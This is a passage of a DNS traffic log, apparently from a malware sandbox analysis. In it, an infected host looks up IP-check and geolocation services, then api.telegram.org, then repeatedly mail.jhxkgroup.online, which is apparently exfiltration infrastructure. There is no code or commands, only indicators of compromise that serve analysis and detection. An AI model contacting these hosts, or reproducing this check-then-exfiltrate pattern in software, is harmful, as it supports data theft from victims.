Sep 26, 2024 09:21:09.299113035 CEST	53	51870	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:09.299232006 CEST	51870	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:09.306920052 CEST	53	51870	8.8.8.8	192.168.2.22
Sep 26, 2024 09:21:10.613162041 CEST	65009	53	192.168.2.22	8.8.8.8
Sep 26, 2024 09:21:10.622241974 CEST	53	65009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 09:19:26.586587906 CEST	192.168.2.22	8.8.8.8	0x247c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.767976999 CEST	192.168.2.22	8.8.8.8	0xd0e7	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:27.556958914 CEST	192.168.2.22	8.8.8.8	0xbeba	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.469259977 CEST	192.168.2.22	8.8.8.8	0x67c9	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.478178978 CEST	192.168.2.22	8.8.8.8	0xdd2d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:30.218724012 CEST	192.168.2.22	8.8.8.8	0xf6d9	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.247973919 CEST	192.168.2.22	8.8.8.8	0xc0c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.259965897 CEST	192.168.2.22	8.8.8.8	0xda4c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.743609905 CEST	192.168.2.22	8.8.8.8	0xf59e	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.393208981 CEST	192.168.2.22	8.8.8.8	0x9708	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.402793884 CEST	192.168.2.22	8.8.8.8	0xc760	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:33.324820042 CEST	192.168.2.22	8.8.8.8	0xf848	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:33.992482901 CEST	192.168.2.22	8.8.8.8	0xa4d3	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:34.001797915 CEST	192.168.2.22	8.8.8.8	0xfc7a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:35.393383026 CEST	192.168.2.22	8.8.8.8	0x14bd	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.052402973 CEST	192.168.2.22	8.8.8.8	0x4c04	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.060895920 CEST	192.168.2.22	8.8.8.8	0x7205	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:37.896891117 CEST	192.168.2.22	8.8.8.8	0x9c7e	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.588713884 CEST	192.168.2.22	8.8.8.8	0xe37f	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:38.617883921 CEST	192.168.2.22	8.8.8.8	0xa3d1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:39.539434910 CEST	192.168.2.22	8.8.8.8	0x7530	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.172224998 CEST	192.168.2.22	8.8.8.8	0xa9b5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.181615114 CEST	192.168.2.22	8.8.8.8	0xbe6e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:40.658905029 CEST	192.168.2.22	8.8.8.8	0xd5c4	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:41.281992912 CEST	192.168.2.22	8.8.8.8	0x14e2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:58.353692055 CEST	192.168.2.22	8.8.8.8	0x4102	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:03.525368929 CEST	192.168.2.22	8.8.8.8	0xb364	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:15.785312891 CEST	192.168.2.22	8.8.8.8	0x77cb	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.346084118 CEST	192.168.2.22	8.8.8.8	0x4336	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.353353024 CEST	192.168.2.22	8.8.8.8	0x4336	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.360451937 CEST	192.168.2.22	8.8.8.8	0x4336	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.367913961 CEST	192.168.2.22	8.8.8.8	0x4336	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.375142097 CEST	192.168.2.22	8.8.8.8	0x4336	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.604068041 CEST	192.168.2.22	8.8.8.8	0xbf35	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.641385078 CEST	192.168.2.22	8.8.8.8	0xbf35	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.676589966 CEST	192.168.2.22	8.8.8.8	0xbf35	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.683401108 CEST	192.168.2.22	8.8.8.8	0xbf35	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:20:58.690412998 CEST	192.168.2.22	8.8.8.8	0xbf35	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.328174114 CEST	192.168.2.22	8.8.8.8	0x7af	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.336836100 CEST	192.168.2.22	8.8.8.8	0x7af	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.343971968 CEST	192.168.2.22	8.8.8.8	0x7af	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.350528955 CEST	192.168.2.22	8.8.8.8	0x7af	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:00.357543945 CEST	192.168.2.22	8.8.8.8	0x7af	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.923613071 CEST	192.168.2.22	8.8.8.8	0x6efe	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.930986881 CEST	192.168.2.22	8.8.8.8	0x6efe	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.938046932 CEST	192.168.2.22	8.8.8.8	0x6efe	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.944937944 CEST	192.168.2.22	8.8.8.8	0x6efe	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:02.967175007 CEST	192.168.2.22	8.8.8.8	0x6efe	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.132601023 CEST	192.168.2.22	8.8.8.8	0x616c	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.139672995 CEST	192.168.2.22	8.8.8.8	0x616c	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.146742105 CEST	192.168.2.22	8.8.8.8	0x616c	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.153917074 CEST	192.168.2.22	8.8.8.8	0x616c	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.161408901 CEST	192.168.2.22	8.8.8.8	0x616c	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.344595909 CEST	192.168.2.22	8.8.8.8	0xd70a	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.352052927 CEST	192.168.2.22	8.8.8.8	0xd70a	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.360590935 CEST	192.168.2.22	8.8.8.8	0xd70a	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.367795944 CEST	192.168.2.22	8.8.8.8	0xd70a	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.375183105 CEST	192.168.2.22	8.8.8.8	0xd70a	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.568721056 CEST	192.168.2.22	8.8.8.8	0xef90	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.655184031 CEST	192.168.2.22	8.8.8.8	0xef90	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.661813021 CEST	192.168.2.22	8.8.8.8	0xef90	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.668951035 CEST	192.168.2.22	8.8.8.8	0xef90	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:03.676059008 CEST	192.168.2.22	8.8.8.8	0xef90	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.170811892 CEST	192.168.2.22	8.8.8.8	0x5956	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.178133965 CEST	192.168.2.22	8.8.8.8	0x5956	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.185710907 CEST	192.168.2.22	8.8.8.8	0x5956	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.192900896 CEST	192.168.2.22	8.8.8.8	0x5956	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.200128078 CEST	192.168.2.22	8.8.8.8	0x5956	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.383172989 CEST	192.168.2.22	8.8.8.8	0x44e3	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.390629053 CEST	192.168.2.22	8.8.8.8	0x44e3	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.398060083 CEST	192.168.2.22	8.8.8.8	0x44e3	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.405949116 CEST	192.168.2.22	8.8.8.8	0x44e3	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.412441969 CEST	192.168.2.22	8.8.8.8	0x44e3	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.729196072 CEST	192.168.2.22	8.8.8.8	0x1a4d	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.736429930 CEST	192.168.2.22	8.8.8.8	0x1a4d	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.742955923 CEST	192.168.2.22	8.8.8.8	0x1a4d	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.750129938 CEST	192.168.2.22	8.8.8.8	0x1a4d	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.756659031 CEST	192.168.2.22	8.8.8.8	0x1a4d	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.943656921 CEST	192.168.2.22	8.8.8.8	0xf11b	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.951210022 CEST	192.168.2.22	8.8.8.8	0xf11b	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.958583117 CEST	192.168.2.22	8.8.8.8	0xf11b	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.965799093 CEST	192.168.2.22	8.8.8.8	0xf11b	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:07.973226070 CEST	192.168.2.22	8.8.8.8	0xf11b	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.103986025 CEST	192.168.2.22	8.8.8.8	0x7ef5	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.276947975 CEST	192.168.2.22	8.8.8.8	0x7ef5	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.285861969 CEST	192.168.2.22	8.8.8.8	0x7ef5	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.292778969 CEST	192.168.2.22	8.8.8.8	0x7ef5	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:09.299232006 CEST	192.168.2.22	8.8.8.8	0x7ef5	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:21:10.613162041 CEST	192.168.2.22	8.8.8.8	0x3468	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 09:19:26.715449095 CEST	8.8.8.8	192.168.2.22	0x247c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:26.715449095 CEST	8.8.8.8	192.168.2.22	0x247c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.715449095 CEST	8.8.8.8	192.168.2.22	0x247c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.715449095 CEST	8.8.8.8	192.168.2.22	0x247c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.715449095 CEST	8.8.8.8	192.168.2.22	0x247c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.715449095 CEST	8.8.8.8	192.168.2.22	0x247c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.776418924 CEST	8.8.8.8	192.168.2.22	0xd0e7	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:26.776418924 CEST	8.8.8.8	192.168.2.22	0xd0e7	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.776418924 CEST	8.8.8.8	192.168.2.22	0xd0e7	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.776418924 CEST	8.8.8.8	192.168.2.22	0xd0e7	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.776418924 CEST	8.8.8.8	192.168.2.22	0xd0e7	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:26.776418924 CEST	8.8.8.8	192.168.2.22	0xd0e7	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:27.566807032 CEST	8.8.8.8	192.168.2.22	0xbeba	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:27.566807032 CEST	8.8.8.8	192.168.2.22	0xbeba	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.475591898 CEST	8.8.8.8	192.168.2.22	0x67c9	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:29.475591898 CEST	8.8.8.8	192.168.2.22	0x67c9	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.475591898 CEST	8.8.8.8	192.168.2.22	0x67c9	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.475591898 CEST	8.8.8.8	192.168.2.22	0x67c9	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.475591898 CEST	8.8.8.8	192.168.2.22	0x67c9	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.475591898 CEST	8.8.8.8	192.168.2.22	0x67c9	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.484837055 CEST	8.8.8.8	192.168.2.22	0xdd2d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:29.484837055 CEST	8.8.8.8	192.168.2.22	0xdd2d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.484837055 CEST	8.8.8.8	192.168.2.22	0xdd2d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.484837055 CEST	8.8.8.8	192.168.2.22	0xdd2d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.484837055 CEST	8.8.8.8	192.168.2.22	0xdd2d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:29.484837055 CEST	8.8.8.8	192.168.2.22	0xdd2d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:30.228991032 CEST	8.8.8.8	192.168.2.22	0xf6d9	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:30.228991032 CEST	8.8.8.8	192.168.2.22	0xf6d9	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.255779982 CEST	8.8.8.8	192.168.2.22	0xc0c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:31.255779982 CEST	8.8.8.8	192.168.2.22	0xc0c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.255779982 CEST	8.8.8.8	192.168.2.22	0xc0c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.255779982 CEST	8.8.8.8	192.168.2.22	0xc0c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.255779982 CEST	8.8.8.8	192.168.2.22	0xc0c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.255779982 CEST	8.8.8.8	192.168.2.22	0xc0c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.266483068 CEST	8.8.8.8	192.168.2.22	0xda4c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:31.266483068 CEST	8.8.8.8	192.168.2.22	0xda4c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.266483068 CEST	8.8.8.8	192.168.2.22	0xda4c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.266483068 CEST	8.8.8.8	192.168.2.22	0xda4c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.266483068 CEST	8.8.8.8	192.168.2.22	0xda4c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.266483068 CEST	8.8.8.8	192.168.2.22	0xda4c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.753287077 CEST	8.8.8.8	192.168.2.22	0xf59e	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:31.753287077 CEST	8.8.8.8	192.168.2.22	0xf59e	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.400039911 CEST	8.8.8.8	192.168.2.22	0x9708	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:32.400039911 CEST	8.8.8.8	192.168.2.22	0x9708	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.400039911 CEST	8.8.8.8	192.168.2.22	0x9708	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.400039911 CEST	8.8.8.8	192.168.2.22	0x9708	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.400039911 CEST	8.8.8.8	192.168.2.22	0x9708	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.400039911 CEST	8.8.8.8	192.168.2.22	0x9708	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.410713911 CEST	8.8.8.8	192.168.2.22	0xc760	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:32.410713911 CEST	8.8.8.8	192.168.2.22	0xc760	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.410713911 CEST	8.8.8.8	192.168.2.22	0xc760	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.410713911 CEST	8.8.8.8	192.168.2.22	0xc760	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.410713911 CEST	8.8.8.8	192.168.2.22	0xc760	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:32.410713911 CEST	8.8.8.8	192.168.2.22	0xc760	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:33.331862926 CEST	8.8.8.8	192.168.2.22	0xf848	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:33.331862926 CEST	8.8.8.8	192.168.2.22	0xf848	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:33.998795033 CEST	8.8.8.8	192.168.2.22	0xa4d3	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:33.998795033 CEST	8.8.8.8	192.168.2.22	0xa4d3	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:33.998795033 CEST	8.8.8.8	192.168.2.22	0xa4d3	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:33.998795033 CEST	8.8.8.8	192.168.2.22	0xa4d3	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:33.998795033 CEST	8.8.8.8	192.168.2.22	0xa4d3	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:33.998795033 CEST	8.8.8.8	192.168.2.22	0xa4d3	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:34.008224964 CEST	8.8.8.8	192.168.2.22	0xfc7a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:34.008224964 CEST	8.8.8.8	192.168.2.22	0xfc7a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:34.008224964 CEST	8.8.8.8	192.168.2.22	0xfc7a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:34.008224964 CEST	8.8.8.8	192.168.2.22	0xfc7a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:34.008224964 CEST	8.8.8.8	192.168.2.22	0xfc7a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:34.008224964 CEST	8.8.8.8	192.168.2.22	0xfc7a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:35.400599957 CEST	8.8.8.8	192.168.2.22	0x14bd	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:35.400599957 CEST	8.8.8.8	192.168.2.22	0x14bd	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.058707952 CEST	8.8.8.8	192.168.2.22	0x4c04	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:36.058707952 CEST	8.8.8.8	192.168.2.22	0x4c04	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.058707952 CEST	8.8.8.8	192.168.2.22	0x4c04	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.058707952 CEST	8.8.8.8	192.168.2.22	0x4c04	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.058707952 CEST	8.8.8.8	192.168.2.22	0x4c04	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.058707952 CEST	8.8.8.8	192.168.2.22	0x4c04	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.067337036 CEST	8.8.8.8	192.168.2.22	0x7205	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:19:36.067337036 CEST	8.8.8.8	192.168.2.22	0x7205	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:19:36.067337036 CEST	8.8.8.8	192.168.2.22	0x7205	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
